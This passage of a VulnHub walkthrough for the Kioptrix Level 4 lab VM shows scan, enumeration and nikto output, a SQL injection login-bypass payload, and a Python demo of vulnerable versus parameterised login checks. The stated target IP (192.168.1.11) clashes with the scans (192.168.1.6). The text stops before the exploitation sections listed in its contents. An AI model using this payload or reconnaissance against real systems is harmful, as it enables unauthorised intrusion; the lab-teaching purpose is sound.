VulnHub walkthrough series: Kioptrix Level #4

Disclaimer

This document is for learning and research only. Do not use the techniques or source code in it for illegal purposes; the author bears no responsibility for any negative consequences caused by anyone.

Contents

  • Disclaimer
  • Introduction
  • 1. Environment setup
    • 1.1 Target information
    • 1.2 Target configuration
  • 2. Information gathering
    • 2.1 Host discovery
      • 2.1.1 netdiscover
      • 2.1.2 arp-scan host scan
    • 2.2 Port scanning
    • 2.3 Fingerprinting
    • 2.4 Directory scanning
      • 2.4.1 dirb directory scan
      • 2.4.2 dirsearch directory scan
    • 2.5 Vulnerability entry points
      • 2.5.1 Visiting the home page
      • 2.5.2 nmap vulnerability scan
      • 2.5.3 nikto vulnerability scan
      • 2.5.4 enum4linux enumeration
      • 2.5.5 wfuzz fuzzing
      • 2.5.6 searchsploit search for Samba exploits
  • 3. Penetration testing
    • 3.1 SQL injection
      • 3.1.1 Capturing the login request with Burp Suite
      • 3.1.2 Enumerating databases
      • 3.1.3 Current database
      • 3.1.4 Tables in the current database
      • 3.1.5 Column names
      • 3.1.6 Usernames and passwords
    • 3.2 Shell escape
      • 3.2.1 ssh login
      • 3.2.2 Shell escape
    • 3.3 MySQL UDF privilege escalation
      • 3.3.1 Checking services
      • 3.3.2 Finding php files
      • 3.3.3 Reading the php files
      • 3.3.4 Logging into MySQL
      • 3.3.5 Checking the udf table
      • 3.3.6 Adding the user to the admin group
      • 3.3.7 Switching to root
      • 3.3.8 flag
  • Summary
  • References


Introduction

Today's target: the Kioptrix Level #4 VM.

VulnHub is a platform that provides a range of vulnerable environments; most are ready-made virtual machine images with several vulnerabilities built in. This post walks through the Kioptrix Level #4 VM, covering host discovery (nmap/netdiscover), port scanning (nmap/masscan), directory scanning (dirb/dirsearch), SQL injection, and privilege escalation via a MySQL UDF.

Description
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

  1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
  1a. It’s possible to remotely compromise the machine
  Stays within the target audience of this site
  Must be “realistic” (well kinda…)
  Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
I’d love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
– A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.
– Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
So I hope you enjoy this one.
The Kioptrix Team
Source: http://www.kioptrix.com/blog/?p=604
Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive



1. Environment setup

1.1 Target information

Official link: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
Release date: 8 February 2012
Size: 208MB
Author: Kioptrix
Series: Kioptrix
Difficulty: ★☆☆☆☆

1.2 Target configuration

  • For the pentest environment setup, see the author's earlier post in this series: VulnHub walkthrough series: DC-2
  • [Fix] The target VM does not obtain an IP address automatically after being imported into VMware
  • It is recommended to set the attacking machine's (Kali) network mode to Bridged
  • Importing a vmdk file into VMware (verified working)

2. Information gathering

2.1 Host discovery

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.6     00:0c:29:41:10:00      1      60  VMware, Inc.
 192.168.1.13    ae:d5:7e:a8:51:6a      2     120  Unknown vendor
 192.168.1.1     a0:54:f9:b3:23:54      2     120  Unknown vendor

2.1.2 arp-scan host scan

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.6	00:0c:29:41:10:00	VMware, Inc.
192.168.1.13	ae:d5:7e:a8:51:6a	(Unknown: locally administered)
192.168.1.8	22:cb:7f:9b:2c:c1	(Unknown: locally administered)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded

From the two scans above, the target's details are:
IP address: 192.168.1.11
MAC address: 00:0c:29:b2:d4:13

2.2 Port scanning

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix4 192.168.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00028s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-06-12T16:34:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds

From the scan, the target's open ports are:
Port 22: ssh
Port 80: http
Port 139: netbios-ssn
Port 445: netbios-ssn

2.3 Fingerprinting

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.1.6
WhatWeb report for http://192.168.1.6
Status    : 200 OK
Title     : <None>
IP        : 192.168.1.6
Country   : RESERVED, ZZ

Summary   : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.2.8 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)

[ PHP ]
        PHP is a widely-used general-purpose scripting language
        that is especially suited for Web development and can be
        embedded into HTML. This plugin identifies PHP errors,
        modules and versions and extracts the local file path and
        username if present.

        Version      : 5.2.4-2ubuntu5.6
        Module       : Suhosin-Patch
        Version      : 5.2.4-2ubuntu5.6
        Google Dorks: (2)
        Website     : http://www.php.net/

[ PasswordField ]
        find password fields

        String       : mypassword (from field name)

[ X-Powered-By ]
        X-Powered-By HTTP header

        String       : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 12 Jun 2024 20:38:05 GMT
        Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
        X-Powered-By: PHP/5.2.4-2ubuntu5.6
        Content-Length: 1255
        Connection: close
        Content-Type: text/html

Key information obtained:

  • Apache[2.2.8]
  • HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch]
  • PasswordField[mypassword]
  • PHP[5.2.4-2ubuntu5.6][Suhosin-Patch]
  • X-Powered-By[PHP/5.2.4-2ubuntu5.6]

2.4 Directory scanning

2.4.1 dirb directory scan

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.6

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jun 12 08:40:08 2024
URL_BASE: http://192.168.1.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.6/ ----
+ http://192.168.1.6/cgi-bin/ (CODE:403|SIZE:326)
==> DIRECTORY: http://192.168.1.6/images/
+ http://192.168.1.6/index (CODE:200|SIZE:1255)
+ http://192.168.1.6/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.6/john/
+ http://192.168.1.6/logout (CODE:302|SIZE:0)
+ http://192.168.1.6/member (CODE:302|SIZE:220)
+ http://192.168.1.6/server-status (CODE:403|SIZE:331)

---- Entering directory: http://192.168.1.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Jun 12 08:40:33 2024
DOWNLOADED: 4612 - FOUND: 6

FOUND: 6, six paths were found:

  • http://192.168.1.6/cgi-bin/
  • http://192.168.1.6/index
  • http://192.168.1.6/index.php
  • http://192.168.1.6/logout
  • http://192.168.1.6/member
  • http://192.168.1.6/server-status

2.4.2 dirsearch directory scan

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.6 -e * -x 404,403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txt

Target: http://192.168.1.6/

[08:40:50] Starting:
[08:41:17] 200 -  109B  - /checklogin                                       
[08:41:17] 200 -  109B  - /checklogin.php                                   
[08:41:22] 200 -  298B  - /database.sql                                     
[08:41:33] 301 -  350B  - /images  ->  http://192.168.1.6/images/           
[08:41:33] 200 -  930B  - /images/                                          
[08:41:40] 302 -    0B  - /logout/  ->  index.php                           
[08:41:40] 302 -    0B  - /logout  ->  index.php                            
[08:41:42] 302 -  220B  - /member/  ->  index.php                           
[08:41:42] 302 -  220B  - /member  ->  index.php
[08:41:42] 302 -  220B  - /member/login  ->  index.php
[08:41:42] 302 -  220B  - /member/admin.asp  ->  index.php
[08:41:42] 302 -  220B  - /member/logon  ->  index.php
[08:41:42] 302 -  220B  - /member/login.rb  ->  index.php                   
[08:41:42] 302 -  220B  - /member/signin  ->  index.php                     
[08:41:42] 302 -  220B  - /member/login.html  ->  index.php                 
[08:41:42] 302 -  220B  - /member.php  ->  index.php                        
[08:41:42] 302 -  220B  - /member/login.jsp  ->  index.php                  
[08:41:42] 302 -  220B  - /member/login.asp  ->  index.php                  
[08:41:42] 302 -  220B  - /member/login.py  ->  index.php
[08:41:42] 302 -  220B  - /member/login.39772.zip  ->  index.php

Task Completed

The scan results list the paths above. One caveat: the unquoted * in "-e *" was expanded by the shell to a file in the working directory, as the line "Extensions: 39772.zip" and the "/member/login.39772.zip" hit show, so pass an explicit extension list (for example "-e php,html,txt") instead.

2.5 Vulnerability entry points

2.5.1 Visiting the home page

Visit:

  • http://192.168.1.6/
    This is a login page.
    Payload tested:
  • username: john
  • password: 1' or '1' =' 1
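To show why that payload gets past a login form like the one behind checklogin.php, here is an added example of my own (not the target's PHP): a check that concatenates the form fields into the SQL text, beside the same check with bound parameters, both run against a constructed in-memory SQLite table seeded with a john/1234 row. The table and column names (members, username, password) are assumptions; the example also shows that with the vulnerable query the username does not even need to exist.

```python
import sqlite3

# Constructed sample data standing in for the target's user table.
# Table and column names are assumptions; the john/1234 row is the
# credential pair this walkthrough later finds in database.sql.
SCHEMA = """
CREATE TABLE members (
    id INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    password TEXT NOT NULL
);
INSERT INTO members (username, password) VALUES ('john', '1234');
"""


def make_db() -> sqlite3.Connection:
    """Return an in-memory database populated with the sample row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """A checklogin.php-style check that pastes the form fields straight
    into the SQL string. The payload turns the WHERE clause into
    (username='john' AND password='1') OR '1'='1', which is always true."""
    sql = ("SELECT id FROM members WHERE username='" + user +
           "' AND password='" + pw + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """The same check with bound parameters: the input is always treated
    as data, so the quote characters in the payload never reach the parser."""
    sql = "SELECT id FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None


def demo() -> dict:
    """Run both checks with the real credentials and with the page's payload."""
    conn = make_db()
    payload = "1' or '1'='1"
    return {
        "vuln_real_creds": vulnerable_login(conn, "john", "1234"),
        "vuln_payload": vulnerable_login(conn, "john", payload),
        # username that is not in the table at all
        "vuln_unknown_user_payload": vulnerable_login(conn, "nosuchuser", payload),
        "safe_real_creds": safe_login(conn, "john", "1234"),
        "safe_payload": safe_login(conn, "john", payload),
        "safe_unknown_user_payload": safe_login(conn, "nosuchuser", payload),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```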

2.5.2 nmap vulnerability scan

┌──(root㉿kali)-[/home/kali]
└─# nmap -A -v -sS -Pn -T4 --script=vuln 192.168.1.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:47
Completed NSE at 08:47, 10.01s elapsed
Initiating NSE at 08:47
Completed NSE at 08:47, 0.00s elapsed
Initiating ARP Ping Scan at 08:47
Scanning 192.168.1.6 [1 port]
Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:47
Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
Initiating SYN Stealth Scan at 08:47
Scanning 192.168.1.6 [1000 ports]
Discovered open port 22/tcp on 192.168.1.6
Discovered open port 139/tcp on 192.168.1.6
Discovered open port 445/tcp on 192.168.1.6
Discovered open port 80/tcp on 192.168.1.6
Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
Initiating Service scan at 08:47
Scanning 4 services on 192.168.1.6
Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.6
NSE: Script scanning 192.168.1.6.
Initiating NSE at 08:47
Completed NSE at 08:54, 362.52s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.09s elapsed
Nmap scan report for 192.168.1.6
Host is up (0.0010s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.6
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.6:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.1.6:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.1.6:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false

TRACEROUTE
HOP RTT     ADDRESS
1   1.02 ms 192.168.1.6

NSE: Script Post-scanning.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.04 seconds
           Raw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)

2.5.3 nikto vulnerability scan

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.6
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.6
+ Target Hostname:    192.168.1.6
+ Target Port:        80
+ Start Time:         2024-06-12 08:47:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb  4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /database.sql: Database SQL found.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 1 error(s) and 22 item(s) reported on remote host
+ End Time:           2024-06-12 08:48:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

/database.sql: Database SQL found.
A database dump was found.
Visit the database file:

  • http://192.168.1.6/database.sql
    A user was found:
  • username: john
  • password: 1234
    These credentials did not log in on the web page.

2.5.4 enum4linux enumeration

┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168..1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024

 =========================================( Target Information )=========================================

Target ........... 192.168..1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================

[E] Can't find workgroup/domain


 ================================( Nbtstat Information for 192.168..1.6 )================================

Looking up status of 0.0.0.0
No reply from 0.0.0.0

 ===================================( Session Check on 192.168..1.6 )===================================

[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 192.168.1.6 )============================

[+] Got domain/workgroup name: WORKGROUP


 ================================( Nbtstat Information for 192.168.1.6 )================================

Looking up status of 192.168.1.6
        KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
        KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
        KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

        MAC Address = 00-00-00-00-00-00

 ====================================( Session Check on 192.168.1.6 )====================================

[+] Server 192.168.1.6 allows sessions using username '', password ''


 =================================( Getting domain SID for 192.168.1.6 )=================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ===================================( OS information on 192.168.1.6 )===================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.1.6 from srvinfo:
        KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       4.9
        server type     :       0x809a03


 ========================================( Users on 192.168.1.6 )========================================

index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody    Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert   Name: ,,,       Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root     Name: root      Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john     Name: ,,,       Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret       Name: loneferret,,,     Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]


 ==================================( Share Enumeration on 192.168.1.6 )==================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.1.6

//192.168.1.6/print$    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.6/IPC$      Mapping: N/A Listing: N/A Writing: N/A


 ============================( Password Policy Information for 192.168.1.6 )============================

[+] Attaching to 192.168.1.6 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
        [+] KIOPTRIX4
        [+] Builtin
[+] Password Info for Domain: KIOPTRIX4
        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 =======================================( Groups on 192.168.1.6 )=======================================

[+] Getting builtin groups:
[+]  Getting builtin group memberships:
[+]  Getting local groups:
[+]  Getting local group memberships:
[+]  Getting domain groups:
[+]  Getting domain group memberships:


 ===================( Users on 192.168.1.6 via RID cycling (RIDS: 500-550,1000-1050) )===================

[I] Found new SID:
S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)


 ================================( Getting printer info for 192.168.1.6 )================================

No printers returned.


enum4linux complete on Wed Jun 12 08:56:26 2024

2.5.5 wfuzz fuzzing

